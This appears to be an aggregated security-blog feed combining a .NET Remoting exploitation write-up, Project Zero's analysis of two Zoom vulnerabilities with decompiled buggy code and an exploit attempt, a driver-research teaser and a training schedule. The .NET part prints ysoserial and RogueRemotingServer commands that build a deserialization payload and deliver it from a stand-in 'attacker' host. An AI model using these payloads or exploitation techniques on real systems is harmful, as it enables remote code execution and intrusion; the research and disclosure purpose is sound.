Here is a simple example for illustration: the server creates and registers a transport server channel and then registers the class as a service with a well-known name at the server's registry:

var channel = new TcpServerChannel(12345);
ChannelServices.RegisterChannel(channel);
RemotingConfiguration.RegisterWellKnownServiceType(
    typeof(MyRemotingClass),
    "MyRemotingClass"
);

Then a client just needs the URL of the registered service to do remoting with the server:

var remote = (MyRemotingClass)RemotingServices.Connect(
    typeof(MyRemotingClass),
    "tcp://remoting-server:12345/MyRemotingClass"
);

With this, every invocation of a method or property accessor on remote gets forwarded to the remoting server, executed there, and the result gets returned to the client. This all happens transparently to the developer.

And although .NET Remoting has already been deprecated with the release of .NET Framework 3.0 in 2009 and is no longer available on .NET Core and .NET 5+, it is still around, even in contemporary enterprise level software products.

Remoting Internals

If you are interested in how .NET Remoting works under the hood, here are some insights.

In simple terms: when the client connects to the remoting object provided by the server, it creates a RemotingProxy that implements the specified type MyRemotingClass. All method invocations on remote at the client (except for GetType() and GetHashCode()) will get sent to the server as remoting calls. When a method gets invoked on remote, the proxy creates a MethodCall object that holds the information of the method and passed parameters. It is then passed to a chain of sinks that prepare the MethodCall and handle the remoting communication with the server over the given transport.

On the server side, the received request is also passed to a chain of sinks that reverses the process, which also includes deserialization of the MethodCall object. It ends in a dispatcher sink, which invokes the actual implementation of the method with the passed parameters. The result of the method invocation is then put in a MethodResponse object and gets returned to the client where the client sink chain deserializes the MethodResponse object, extracts the returned object and passes it back to the RemotingProxy.

Channel Sinks

When the client or server creates a channel (either explicitly or implicitly by connecting to a remote service), it also sets up a chain of sinks for processing outgoing and incoming requests. For the server chain, the first sink is a transport sink, followed by formatter sinks (this is where the BinaryFormatter and SoapFormatter are used), and ending in the dispatch sink. It is also possible to add custom sinks. For the three transports, the server default chains are as follows:

  • HttpServerChannel:
    HttpServerTransportSinkSdlChannelSinkSoapServerFormatterSinkBinaryServerFormatterSinkDispatchChannelSink
  • IpcServerChannel:
    IpcServerTransportSinkBinaryServerFormatterSinkSoapServerFormatterSinkDispatchChannelSink
  • TcpServerChannel:
    TcpServerTransportSinkBinaryServerFormatterSinkSoapServerFormatterSinkDispatchChannelSink

On the client side, the sink chain looks similar but in reversed order, so first a formatter sink and finally the transport sink:

Note that the default client sink chain has a default formatter for each transport (HTTP uses SOAP, IPC and TCP use binary format) while the default server sink chain can process both formats. The default sink chains are only used if the channel was not created with an explicit IClientChannelSinkProvider and/or IServerChannelSinkProvider.

Passing Parameters and Return Values

Parameter values and return values can be transfered in two ways:

  • by value: if either the type is serializable (cf. Type.IsSerializable) or if there is a serialization surrogate for the type (see following paragraphs)
  • by reference: if type extends MarshalByRefObject (cf. Type.IsMarshalByRef)

In case of the latter, the objects need to get marshaled using one of the RemotingServices.Marshal methods. They register the object at the server's registry and return a ObjRef instance that holds the URL and type information of the marshaled object.

The marshaling happens automatically during serialization by the serialization surrogate class RemotingSurrogate that is used for the BinaryFormatter/SoapFormatter in .NET Remoting (see CoreChannel.CreateBinaryFormatter(bool, bool) and CoreChannel.CreateSoapFormatter(bool, bool)). A serialization surrogate allows to customize serialization/deserialization of specified types.

In case of objects extending MarshalByRefObject, the RemotingSurrogateSelector returns a RemotingSurrogate (see RemotingSurrogate.GetSurrogate(Type, StreamingContext, out ISurrogateSelector)). It then calls the RemotingSurrogate.GetObjectData(Object, SerializationInfo, StreamingContext) method, which calls the RemotingServices.GetObjectData(object, SerializationInfo, StreamingContext), which then calls RemotingServices.MarshalInternal(MarshalByRefObject, string, Type). That basically means, every remoting object extending MarshalByRefObject is substituted with a ObjRef and thus passed by reference instead of by value.

On the receiving side, if an ObjRef gets deserialized by the BinaryFormatter/SoapFormatter, the IObjectReference.GetRealObject(StreamingContext) implementation of ObjRef gets called eventually. That interface method is used to replace an object during deserialization with the object returned by that method. In case of ObjRef, the method results in a call to RemotingServices.Unmarshal(ObjRef, bool), which creates a RemotingProxy of the type and target URL specified in the deserialized ObjRef.

That means, in .NET Remoting all objects extending MarshalByRefObject are passed by reference using an ObjRef. And deserializing an ObjRef with a BinaryFormatter/SoapFormatter (not just limited to .NET Remoting) results in the creation of a RemotingProxy.

With this knowledge in mind, it should be easier to follow the rest of this post.

Previous Work

Most of the issues of .NET Remoting and the runtime serializers BinaryFormatter/SoapFormatter have already been identified by James Forshaw:

We highly encourage you to take the time to read the papers/posts. They are also the foundation of the ExploitRemotingService tool that will be detailed in ExploitRemotingService Explained further down in this post.

Security Features, Pitfalls, and Bypasses

The .NET Remoting is fairly configurable. The following security aspects are built-in and can be configured using special channel and formatter properties:

HTTP Channel IPC Channel TCP Channel
Authentication n/a n/a
  • secure=bool channel property
  • ISecurableChannel.IsSecured (via NegotiateStream; default: false)
Authorization n/a
  • authorizationGroups=Windows/AD Group channel property (default: thread owner is allowed, NT Authority\Network group (SID S-1-5-2) is denied)
  • CommonSecurityDescriptor passed to a IpcServerChannel constructor
custom IAuthorizeRemotingConnection class
  • authorizationModule channel property
  • passed to TcpServerChannel constructor
Impersonation n/a impersonate=bool (default: false) impersonate=bool (default: false)
Conf., Int., Auth. Protection n/a n/a protectionLevel={None, Sign, EncryptAndSign} channel property
Interface Binding n/a n/a rejectRemoteRequests=bool (loopback only, default: false), bindTo=address (specific IP address, default: n/a)

Pitfalls and important notes on these security features:

HTTP Channel
  • No security features provided; ought to be implemented in IIS or by custom server sinks.
IPC Channel
  • By default, access to named pipes created by the IPC server channel are denied to NT Authority\Network group (SID S-1-5-2), i. e., they are only accessible from the same machine. However, by using authorizationGroup, the network restriction is not in place so that the group that is allowed to access the named pipe may also do it remotely (not supported by the default IpcClientTransportSink, though).
TCP Channel
  • With a secure TCP channel, authentication is required. However, if no custom IAuthorizeRemotingConnection is configured for authorization, it is possible to logon with any valid Windows account, including NT Authority\Anonymous Logon (SID S-1-5-7).

ExploitRemotingService Explained

James Forshaw also released ExploitRemotingService, which contains a tool for attacking .NET Remoting services via IPC/TCP by the various attack techniques. We'll try to explain them here.

There are basically two attack modes:

raw
Exploit BinaryFormatter/SoapFormatter deserialization (see also YSoSerial.Net)
all others commands (see -h)
Write a FakeAsm assembly to the server's file system, load a type from it to register it at the server to be accessible via the existing .NET Remoting channel. It is then accessible via .NET Remoting and can perform various commands.

To see the real beauty of his sorcery and craftsmanship, we'll try to explain the different operating options for the FakeAsm exploitation and their effects:

without options
Send a FakeMessage that extends MarshalByRefObject and thus is a reference (ObjRef) to an object on the attacker's server. On deserialization, the victim's server creates a proxy that transparently forwards all method invocations to the attacker's server. By exploiting a TOCTOU flaw, the get_MethodBase() property method of the sent message (FakeMessage) can be adjusted so that even static methods can be called. This allows to call File.WriteAllBytes(string, byte[]) on the victim's machine.
--useser
Send a forged Hashtable with a custom IEqualityComparer by reference that implements GetHashCode(object), which gets called by the victim server on the attacker's server remotely. As for the key, a FileInfo/DirectoryInfo object is wrapped in SerializationWrapper that ensures the attacker's object gets marshaled by value instead of by reference. However, on the remote call of GetHashCode(object), the victim's server sends the FileInfo/DirectoryInfo by reference so that the attacker has a reference to the FileInfo/DirectoryInfo object on the victim.
--uselease
Call MarshalByRefObject.InitializeLifetimeService() on a published object to get an ILease instance. Then call Register(ISponsor) with an MarshalByRefObject object as parameter to make the server call the IConvertible.ToType(Type, IformatProvider) on an object of the attacker's server, which then can deliver the deserialization payload.

Now the problem with the --uselease option is that the remote class needs to return an actual ILease object and not null. This may happen if the virtual MarshalByRefObject.InitializeLifetimeService() method is overriden. But the main principle of sending an ObjRef referencing an object on the attacker's server can be generalized with any method accepting a parameter. That is why we have added the --useobjref to ExploitRemotingService (see also Community Contributions further below):

--useobjref
Call the MarshalByRefObject.GetObjRef(Type) method with an ObjRef as parameter value. Similarly to --uselease, the server calls IConvertible.ToType(Type, IformatProvider) on the proxy, which sends a remoting call to the attacker's server.

Security Measures and Troubleshooting

If no custom errors are enabled and a RemotingException gets returned by the server, the following may help to identify the cause and to find a solution:

Error Reason ExampleRemotingService Options ExploitRemotingService Bypass Options
"Requested Service not found" The URI of an existing remoting service must be known; there is no way to iterate them. n/a --nulluri may work if remoting service has not been servicing any requests yet.
NotSupportedException with link to KB 390633 Disallow received IMessage being MarshalByRefObject (see AppSettings.AllowTransparentProxyMessage) -d --uselease, --useobjref
SecurityException with PermissionSet info Code Access Security (CAS) restricted permissions in place (TypeFilterLevel.Low) -t low --uselease, --useobjref

Community Contributions

Our research on .NET Remoting led to some new insights and discoveries that we want to share with the community. Together with this blog post, we have prepared the following contributions and new releases.

ExploitRemotingService

The ExploitRemotingService is already a magnificent tool for exploiting .NET Remoting services. However, we have made some additions to ExploitRemotingService that we think are worthwhile:

--useobjref option
This newly added option allows to use the ObjRef trick described
--remname option
Assemblies can only be loaded by name once. If that loading fails, the runtime remembers that and avoids trying to load it again. That means, writing the FakeAsm.dll to the target server's file system and loading a type from that assembly must succeed on the first attempt. The problem here is to find the proper location to write the assembly to where it will be searched by the runtime (ExploitRemotingService provides the options --autodir and --installdir=… to specify the location to write the DLL to). We have modified ExploitRemotingService to use the --remname to name the FakeAsm assembly so that it is possible to have multiple attempts of writing the assembly file to an appropriate location.
--ipcserver option
As IPC server channels may be accessible remotely, the --ipcserver option allows to specify the server's name for a remote connection.

YSoSerial.Net

The new ObjRef gadget is basically the equivalent of the sun.rmi.server.UnicastRef class used by the JRMPClient gadget in ysoserial for Java: on deserialization via BinaryFormatter/SoapFormatter, the ObjRef gets transformed to a RemotingProxy and method invocations on that object result in the attempt to send an outgoing remote method call to a specified target .NET Remoting endpoint. This can then be used with the RogueRemotingServer described below.

RogueRemotingServer

The newly released RogueRemotingServer is the counterpart of the ObjRef gadget for YSoSerial.Net. It is the equivalent to the JRMPListener server in ysoserial for Java and allows to start a rogue remoting server that delivers a raw BinaryFormatter/SoapFormatter payload via HTTP/IPC/TCP.

Example of ObjRef Gadget and RogueRemotingServer

Here is an example of how these tools can be used together:

# generate a SOAP payload for popping MSPaint
ysoserial.exe -f SoapFormatter -g TextFormattingRunProperties -o raw -c MSPaint.exe
  > MSPaint.soap

# start server to deliver the payload on all interfaces
RogueRemotingServer.exe --wrapSoapPayload http://0.0.0.0/index.html MSPaint.soap
# test the ObjRef gadget with the target http://attacker/index.html
ysoserial.exe -f BinaryFormatter -g ObjRef -o raw -c http://attacker/index.html -t

During deserialization of the ObjRef gadget, an outgoing .NET Remoting method call request gets sent to the RogueRemotingServer, which replies with the TextFormattingRunProperties gadget payload.

Conclusion

.NET Remoting has already been deprecated long time ago for obvious reasons. If you are a developer, don't use it and migrate from .NET Remoting to WCF.

If you have detected a .NET Remoting service and want to exploit it, we'll recommend the excellent ExploitRemotingService by James Forshaw that works with IPC and TCP (for HTTP, have a look at Finding and Exploiting .NET Remoting over HTTP using Deserialisation by Soroush Dalili). If that doesn't succeed, you may want to try it with the enhancements added to our fork of ExploitRemotingService, especially the --useobjref technique and/or naming the FakeAsm assembly via --remname might help. And even if none of these work, you may still be able to invoke arbitrary methods on the exposed objects and take advantage of that.

Windows Drivers Reverse Engineering Methodology

By: voidsec
20 January 2022 at 15:30

With this blog post I’d like to sum up my year-long Windows Drivers research; share and detail my own methodology for reverse engineering (WDM) Windows drivers, finding some possible vulnerable code paths as well as understanding their exploitability. I’ve tried to make it as “noob-friendly” as possible, documenting all the steps I usually perform during […]

The post Windows Drivers Reverse Engineering Methodology appeared first on VoidSec.

Zooming in on Zero-click Exploits

By: Ryan
18 January 2022 at 17:28

Posted by Natalie Silvanovich, Project Zero


Zoom is a video conferencing platform that has gained popularity throughout the pandemic. Unlike other video conferencing systems that I have investigated, where one user initiates a call that other users must immediately accept or reject, Zoom calls are typically scheduled in advance and joined via an email invitation. In the past, I hadn’t prioritized reviewing Zoom because I believed that any attack against a Zoom client would require multiple clicks from a user. However, a zero-click attack against the Windows Zoom client was recently revealed at Pwn2Own, showing that it does indeed have a fully remote attack surface. The following post details my investigation into Zoom.

This analysis resulted in two vulnerabilities being reported to Zoom. One was a buffer overflow that affected both Zoom clients and MMR servers, and one was an info leak that is only useful to attackers on MMR servers. Both of these vulnerabilities were fixed on November 24, 2021.

Zoom Attack Surface Overview

Zoom’s main feature is multi-user conference calls called meetings that support a variety of features including audio, video, screen sharing and in-call text messages. There are several ways that users can join Zoom meetings. To start, Zoom provides full-featured installable clients for many platforms, including Windows, Mac, Linux, Android and iPhone. Users can also join Zoom meetings using a browser link, but they are able to use fewer features of Zoom. Finally, users can join a meeting by dialing phone numbers provided in the invitation on a touch-tone phone, but this only allows access to the audio stream of a meeting. This research focused on the Zoom client software, as the other methods of joining calls use existing device features.

Zoom clients support several communication features other than meetings that are available to a user’s Zoom Contacts. A Zoom Contact is a user that another user has added as a contact using the Zoom user interface. Both users must consent before they become Zoom Contacts. Afterwards, the users can send text messages to one another outside of meetings and start channels for persistent group conversations. Also, if either user hosts a meeting, they can invite the other user in a manner that is similar to a phone call: the other user is immediately notified and they can join the meeting with a single click. These features represent the zero-click attack surface of Zoom. Note that this attack surface is only available to attackers that have convinced their target to accept them as a contact. Likewise, meetings are part of the one-click attack surface only for Zoom Contacts, as other users need to click several times to enter a meeting.

That said, it’s likely not that difficult for a dedicated attacker to convince a target to join a Zoom call even if it takes multiple clicks, and the way some organizations use Zoom presents interesting attack scenarios. For example, many groups host public Zoom meetings, and Zoom supports a paid Webinar feature where large groups of unknown attendees can join a one-way video conference. It could be possible for an attacker to join a public meeting and target other attendees. Zoom also relies on a server to transmit audio and video streams, and end-to-end encryption is off by default. It could be possible for an attacker to compromise Zoom’s servers and gain access to meeting data.

Zoom Messages

I started out by looking at the zero-click attack surface of Zoom. Loading the Linux client into IDA, it appeared that a great deal of its server communication occurred over XMPP. Based on strings in the binary, it was clear that XMPP parsing was performed using a library called gloox. I fuzzed this library using AFL and other coverage-guided fuzzers, but did not find any vulnerabilities. I then looked at how Zoom uses the data provided over XMPP.

XMPP traffic seemed to be sent over SSL, so I located the SSL_write function in the binary based on log strings, and hooked it using Frida. The output contained many XMPP stanzas (messages) as well as other network traffic, which I analyzed to determine how XMPP is used by Zoom. XMPP is used for most communication between Zoom clients outside of meetings, such as messages and channels, and is also used for signaling (call set-up) when a Zoom Contact invites another Zoom Contact to a meeting.

I spent some time going through the client binary trying to determine how the client processes XMPP, for example, if a stanza contains a text message, how is that message extracted and displayed in the client. Even though the Zoom client contains many log strings, this was challenging, and I eventually asked my teammate Ned Williamson for help locating symbols for the client. He discovered that several old versions of the Android Zoom SDK contained symbols. While these versions are roughly five years old, and do not present a complete view of the client as they only include some libraries that it uses, they were immensely helpful in understanding how Zoom uses XMPP.

Application-defined tags can be added to gloox’s XMPP parser by extending the class StanzaExtension and implementing the method newInstance to define how the tag is converted into a C++ object. Parsed XMPP stanzas are then processed using the MessageHandler class. Application developers extend this class, implementing the method handleMessage with code that performs application functionality based on the contents of the stanza received. Zoom implements its XMPP handling in CXmppIMSession::handleMessage, which is a large function that is an entrypoint to most messaging and calling features. The final processing stage of many XMPP tags is in the class ns_zoom_messager::CZoomMMXmppWrapper, which contains many methods starting with ‘On’ that handle specific events. I spent a fair amount of time analyzing these code paths, but didn’t find any bugs. Interestingly, Thijs Alkemade and Daan Keuper released a write-up of their Pwn2Own bug after I completed this research, and it involved a vulnerability in this area.

RTP Processing

Afterwards, I investigated how Zoom clients process audio and video content. Like all other video conferencing systems that I have analyzed, it uses Real-time Transport Protocol (RTP) to transport this data. Based on log strings included in the Linux client binary, Zoom appears to use a branch of WebRTC for audio. Since I have looked at this library a great deal in previous posts, I did not investigate it further. For video, Zoom implements its own RTP processing and uses a custom underlying codec named Zealot (libzlt).

Analyzing the Linux client in IDA, I found what I believed to be the video RTP entrypoint, and fuzzed it using afl-qemu. This resulted in several crashes, mostly in RTP extension processing. I tried modifying the RTP sent by a client to reproduce these bugs, but it was not received by the device on the other side and I suspected the server was filtering it. I tried to get around this by enabling end-to-end encryption, but Zoom does not encrypt RTP headers, only the contents of RTP packets (as is typical of most RTP implementations).

Curious about how Zoom server filtering works, I decided to set up Zoom On-Premises Deployment. This is a Zoom product that allows customers to set up on-site servers to process their organization’s Zoom calls. This required a fair amount of configuration, and I ended up reaching out to the Zoom Security Team for assistance. They helped me get it working, and I greatly appreciate their contribution to this research.

Zoom On-Premises Deployments consist of two hosts: the controller and the Multimedia Router (MMR). Analyzing the traffic to each server, it became clear that the MMR is the host that transmits audio and video content between Zoom clients. Loading the code for the MMR process into IDA, I located where RTP is processed, and it indeed parses the extensions as a part of its forwarding logic and verifies them correctly, dropping any RTP packets that are malformed.

The code that processes RTP on the MMR appeared different than the code that I fuzzed on the device, so I set up fuzzing on the server code as well. This was challenging, as the code was in the MMR binary, which was not compiled as a relocatable binary (more on this later). This meant that I couldn’t load it as a library and call into specific offsets in the binary as I usually do to fuzz binaries that don’t have source code available. Instead, I compiled my own fuzzing stub that called the function I wanted to fuzz as a relocatable that defined fopen, and loaded it using LD_PRELOAD when executing the MMR binary. Then my code would take control of execution the first time that the MMR binary called fopen, and was able to call the function being fuzzed.

This approach has a lot of downsides, the biggest being that the fuzzing stub can’t accept command line parameters, execution is fairly slow and a lot of fuzzing tools don’t honor LD_PRELOAD on the target. That said, I was able to fuzz with code coverage using Mateusz Jurczyk’s excellent DrSanCov, with no results.

Packet Processing

When analyzing RTP traffic, I noticed that both Zoom clients and the MMR server process a great deal of packets that didn’t appear to be RTP or XMPP. Looking at the SDK with symbols, one library appeared to do a lot of serialization: libssb_sdk.so. This library contains a great deal of classes with the methods load_from and save_to defined with identical declarations, so it is likely that they all implement the same virtual class.

One parameter to the load_from methods is an object of class msg_db_t,  which implements a buffer that supports reading different data types. Deserialization is performed by load_from methods by reading needed data from the msg_db_t object, and serialization is performed by save_to methods by writing to it.

After hooking a few save_to methods with Frida and comparing the written output to data sent with SSL_write, it became clear that these serialization classes are part of the remote attack surface of Zoom. Reviewing each load_from method, several contained code similar to the following (from ssb::conf_send_msg_req::load_from).

ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::operator>>(

msg_db, &this->str_len, consume_bytes, error_out);

  str_len = this->str_len;

  if ( str_len )

  {

    mem = operator new[](str_len);

    out_len = 0;

    this->str_mem = mem;

    ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::

read_str_with_len(msg_db, mem, &out_len);

read_str_with_len is defined as follows.

int __fastcall ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::

read_str_with_len(msg_db_t* msg, signed __int8 *mem,

unsigned int *len)

{

  if ( !msg->invalid )

  {

ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::operator>>(msg, len, (int)len, 0);

    if ( !msg->invalid )

    {

      if ( *len )

        ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::

read(msg, mem, *len, 0);

    }

  }

  return msg;

}

Note that the string buffer is allocated based on a length read from the msg_db_t buffer, but then a second length is read from the buffer and used as the length of the string that is read. This means that if an attacker could manipulate the contents of the msg_db_t buffer, they could specify the length of the buffer allocated, and overwrite it with any length of data (up to a limit of 0x1FFF bytes, not shown in the code snippet above).

I tested this bug by hooking SSL_write with Frida, and sending the malformed packet, and it caused the Zoom client to crash on a variety of platforms. This vulnerability was assigned CVE-2021-34423 and fixed on November 24, 2021.

Looking at the code for the MMR server, I noticed that ssb::conf_send_msg_req::load_from, the class the vulnerability occurs in was also present on the MMR server. Since the MMR forwards Zoom meeting traffic from one client to another, it makes sense that it might also deserialize this packet type. I analyzed the MMR code in IDA, and found that deserialization of this class only occurs during Zoom Webinars. I purchased a Zoom Webinar license, and was able to crash my own Zoom MMR server by sending this packet. I was not willing to test a vulnerability of this type on Zoom’s public MMR servers, but it seems reasonably likely that the same code was also in Zoom’s public servers.

Looking further at deserialization, I noticed that all deserialized objects contain an optional field of type ssb::dyna_para_table_t, which is basically a properties table that allows a map of name strings to variant objects to be included in the deserialized object. The variants in the table are implemented by the structure ssb::variant_t, as follows.

struct variant{

char type;

short length;

var_data data;

};

union var_data{

        char i8;

        char* i8_ptr;

        short i16;

        short* i16_ptr;

        int i32;

        int* i32_ptr;

        long long i64;

        long long i64*;

};

The value of the type field corresponds to the width of the variant data (1 for 8-bit, 2 for 16-bit, 3 for 32-bit and 4 four 64-bit). The length field specifies whether the variant is an array and its length. If it has the value 0, the variant is not an array, and a numeric value is read from the data field based on its type. If the length field has any other value, the data field is cast to a pointer, an array of that size is read.

My immediate concern with this implementation was that it could be prone to type confusion. One possibility is that a numeric value could be confused with an array pointer, which would allow an attacker to create a variant with a pointer that they specify. However, both the client and MMR perform very aggressive type checks on variants they treat as arrays. Another possibility is that a pointer could be confused with a numeric value. This could allow an attacker to determine the address of a buffer they control if the value is ever returned to the attacker. I found a few locations in the MMR code where a pointer is converted to a numeric value in this way and logged, but nowhere that an attacker could obtain the incorrectly cast value. Finally, I looked at how array data is handled, and I found that there are several locations where byte array variants are converted to strings, however not all of them checked that the byte array has a null terminator. This meant that if these variants were converted to strings, the string could contain the contents of uninitialized memory.

Most of the time, packets sent to the MMR by one user are immediately forwarded to other users without being deserialized by the server. For some bugs, this is a useful feature, for example, it is what allows CVE-2021-34423 discussed earlier to be triggered on a client. However, an information leak in variants needs to occur on the server to be useful to an attacker. When a client deserializes an incoming packet, it is for use on the device, so even if a deserialized string contains sensitive information, it is unlikely that this information will be transmitted off the device. Meanwhile, the MMR exists expressly to transmit information from one user to another, so if a string gets deserialized, there is a reasonable chance that it gets sent to another user, or alters server behavior in an observable way. So, I tried to find a way to get the server to deserialize a variant and convert it to a string. I eventually figured out that when a user logs into Zoom in a browser, the browser can’t process serialized packets, so the MMR must convert them to strings so they can be accessed through web requests. Indeed, I found that if I removed the null terminator from the user_name variant, it would be converted to a string and sent to the browser as the user’s display name.

The vulnerability was assigned CVE-2021-34424 and fixed on November 24, 2021. I tested it on my own MMR as well as Zoom’s public MMR, and it worked and returned pointer data in both cases.

Exploit Attempt

I attempted to exploit my local MMR server with these vulnerabilities, and while I had success with portions of the exploit, I was not able to get it working. I started off by investigating the possibility of creating a client that could trigger each bug outside of the Zoom client, but client authentication appeared complex and I lacked symbols for this part of the code, so I didn’t pursue this as I suspected it would be very time-consuming. Instead, I analyzed the exploitability of the bugs by triggering them from a Linux Zoom client hooked with Frida.

I started off by investigating the impact of heap corruption on the MMR process. MMR servers run on CentOS 7, which uses a modern glibc heap, so exploiting heap unlinking did not seem promising. I looked into overwriting the vtable of a C++ object allocated on the heap instead.

 

I wrote several Frida scripts that hooked malloc on the server, and used them to monitor how incoming traffic affects allocation. It turned out that there are not many ways for an attacker to control memory allocation on an MMR server that are useful for exploiting this vulnerability. There are several packet types that an attacker can send to the server that cause memory to be allocated on the heap and then freed when processing is finished, but not as many where the attacker can trigger both allocation and freeing. Moreover, the MMR server performs different types of processing in separate threads that use unique heap arenas, so many areas of the code where this type of allocation is likely to occur, such as connection management, allocate memory in a different heap arena than the thread where the bug occurs. The only such allocations I could find that were made in the same arena were related to meeting set-up: when a user joins a meeting, certain objects are allocated on the heap, which are then freed when they leave the meeting. Unfortunately, these allocations are difficult to automate as they require many unique users accounts in order for the allocation to be performed repeatedly, and allocation takes an observable amount of time (seconds).

I eventually wrote Frida scripts that looked for free chunks of unusual sizes that bordered C++ objects with vtables during normal MMR operation. There were a few allocation sizes that met this criteria, and since CVE-2021-34423 allows for the size of the buffer that is overflowed to be specified by the attacker, I was able to corrupt the memory of the adjacent object. Unfortunately, heap verification was very robust, so in most cases, the MMR process would crash due to a heap verification error before a virtual call was made on the corrupted object. I eventually got around this by focusing on allocation sizes that are small enough to be stored in fastbins by the heap, as heap chunks that are stored in fastbins do not contain verifiable heap metadata. Chunks of size 58 turned out to be the best choice, and by triggering the bug with an allocation of that size, I was able to control the pointer of a virtual call about one in ten times I triggered the bug.

The next step was to figure out where to point the pointer I could control, and this turned out to be more challenging than I expected. The MMR process did not have ASLR enabled when I did this research (it was enabled in version 4.6.20211128.136, which was released on November 28, 2021), so I was hoping to find a series of locations in the binary that this call could be directed to that would eventually end in a call to execv with controllable parameters, as the MMR initialization code contains many calls to this function. However, there were a few features of the server that made this difficult. First, only the MMR binary was loaded at a fixed location. The heap and system libraries were not, so only the actual MMR code was available without bypassing ASLR. Second, if the MMR crashes, it has an exponential backoff which culminates in it respawning every hour on the hour. This limits how many exploit attempts an attacker has. It is realistic that an attacker might spend days or even weeks trying to exploit a server, but this still limits them to hundreds of attempts. This means that any exploit of an MMR server would need to be at least somewhat reliable, so certain techniques that require a lot of attempts, such as allocating a large buffer on the heap and trying to guess its location were not practical.

I eventually decided that it would be helpful to allocate a buffer on the heap with controlled contents and determine its location. This would make the exploit fairly reliable in the case that the overflow successfully leads to a virtual call, as the buffer could be used as a fake vtable, and also contain strings that could be used as parameters to execv. I tried using CVE-2021-34424 to leak such an address, but wasn’t able to get this working.

This bug allows the attacker to provide a string of any size, which then gets copied out of bounds up until a null character is encountered in memory, and then returned. It is possible for CVE-2021-34424 to return a heap pointer, as the MMR maps the heap that gets corrupted at a low address that does not usually contain null bytes, however, I could not find a way to force a specific heap pointer to be allocated next to the string buffer that gets copied out of bounds. C++ objects used by the MMR tend to be virtual objects, so the first 64 bits of most object allocations are a vtable which contains null bytes, ending the copy. Other allocated structures, especially larger ones, tend to contain non-pointer data. I was able to get this bug to return heap pointers by specifying a string that was less than 64 bits long, so the nearby allocations were sometimes the pointers themselves, but allocations of this size are so frequent it was not possible to ascertain what heap data they pointed to with any accuracy.

One last idea I had was to use another type confusion bug to leak a pointer to a controllable buffer. There is one such bug in the processing of deserialized ssb::kv_update_req objects. This object’s ssb::dyna_para_table_t table contains a variant named nodeid which represents the specific Zoom client that the message refers to. If an attacker changes this variant to be of type array instead of a 32-bit integer, the address of the pointer to this array will be logged as a string. I tried to combine CVE-2021-34424 with this bug, hoping that it might be possible for the leaked data to be this log string that contains pointer information. Unfortunately, I wasn’t able to get this to work because of timing: the log entry needs to be logged at almost exactly the same time as the bug is triggered so that the log data is still in memory, and I wasn't able to send packets fast enough. I suspect it might be possible for this to work with improved automation, as I was relying on clients hooked with Frida and browsers to interact with the Zoom server, but I decided not to pursue this as it would require tooling that would take substantial effort to develop.

Conclusion

I performed a security analysis of Zoom and reported two vulnerabilities. One was a buffer overflow that affected both Zoom clients and MMR servers, and one was an info leak that is only useful to attackers on MMR servers. Both of these vulnerabilities were fixed on November 24, 2021.

The vulnerabilities in Zoom’s MMR server are especially concerning, as this server processes meeting audio and video content, so a compromise could allow an attacker to monitor any Zoom meetings that do not have end-to-end encryption enabled. While I was not successful in exploiting these vulnerabilities, I was able to use them to perform many elements of exploitation, and I believe that an attacker would be able to exploit them with sufficient investment. The lack of ASLR in the Zoom MMR process greatly increased the risk that an attacker could compromise it, and it is positive that Zoom has recently enabled it. That said, if vulnerabilities similar to the ones that I reported still exist in the MMR server, it is likely that an attacker could bypass it, so it is also important that Zoom continue to improve the robustness of the MMR code.

It is also important to note that this research was possible because Zoom allows customers to set up their own servers, meanwhile no other video conferencing solution with proprietary servers that I have investigated allows this, so it is unclear how these results compare to other video conferencing platforms.

Overall, while the client bugs that were discovered during this research were comparable to what Project Zero has found in other videoconferencing platforms, the server bugs were surprising, especially when the server lacked ASLR and supports modes of operation that are not end-to-end encrypted.

There are a few factors that commonly lead to security problems in videoconferencing applications that contributed to these bugs in Zoom. One is the huge amount of code included in Zoom. There were large portions of code that I couldn’t determine the functionality of, and many of the classes that could be deserialized didn’t appear to be commonly used. This both increases the difficulty of security research and increases the attack surface by making more code that could potentially contain vulnerabilities available to attackers. In addition, Zoom uses many proprietary formats and protocols which meant that understanding the attack surface of the platform and creating the tooling to manipulate specific interfaces was very time consuming. Using the features we tested also required paying roughly $1500 USD in licensing fees. These barriers to security research likely mean that Zoom is not investigated as often as it could be, potentially leading to simple bugs going undiscovered.  

Still, my largest concern in this assessment was the lack of ASLR in the Zoom MMR server. ASLR is arguably the most important mitigation in preventing exploitation of memory corruption, and most other mitigations rely on it on some level to be effective. There is no good reason for it to be disabled in the vast majority of software. There has recently been a push to reduce the susceptibility of software to memory corruption vulnerabilities by moving to memory-safe languages and implementing enhanced memory mitigations, but this relies on vendors using the security measures provided by the platforms they write software for. All software written for platforms that support ASLR should have it (and other basic memory mitigations) enabled.

The closed nature of Zoom also impacted this analysis greatly. Most video conferencing systems use open-source software, either WebRTC or PJSIP. While these platforms are not free of problems, it’s easier for researchers, customers and vendors alike to verify their security properties and understand the risk they present because they are open. Closed-source software presents unique security challenges, and Zoom could do more to make their platform accessible to security researchers and others who wish to evaluate it. While the Zoom Security Team helped me access and configure server software, it is not clear that support is available to other researchers, and licensing the software was still expensive. Zoom, and other companies that produce closed-source security-sensitive software should consider how to make their software accessible to security researchers.

Planned Upcoming Classes

15 January 2022 at 09:38

Some people asked me if I had a schedule of trainings I plan to do in the coming months. Well, here it is. At this point I would like to gauge interest, and plan the course hours (time zone) to accommodate the majority of participants.

I am moving to classes that are partly full days and partly half days. The full day sessions are going to be recorded for the participants (so that if anyone misses something because of urgent work, inconvenient time zone, etc., the recording should help). The half days are not recorded, and should be easier to handle, since they are only about 4 hours long.

Here is the planned course list with dates (f=full day, all others are half-days). The cost is in USD (paid by individual / paid by a company):

  • COM Programming with C++ (3 days): April 25, 26, 27, 28, May 2, 3 (Cost: 700/1300)
  • Windows System Programming (5 days): May 16 (f), 17, 18, 19, 23 (f), 24, 25, 26 (Cost: 800/1500)
  • Windows Kernel Programming (4 days): June 6 (f), 8, 9, 13 (f), 14 (Cost: 800/1500)
  • Windows Internals (5 days): July 11 (f), 12, 13, 14, 18 (f), 19, 20, 21 (Cost: 800/1500)
  • Advanced Kernel Programming (New!) (4 days): September 12 (f), 13, 14, 15, 19, 20, 21 (Cost: 800/1500)

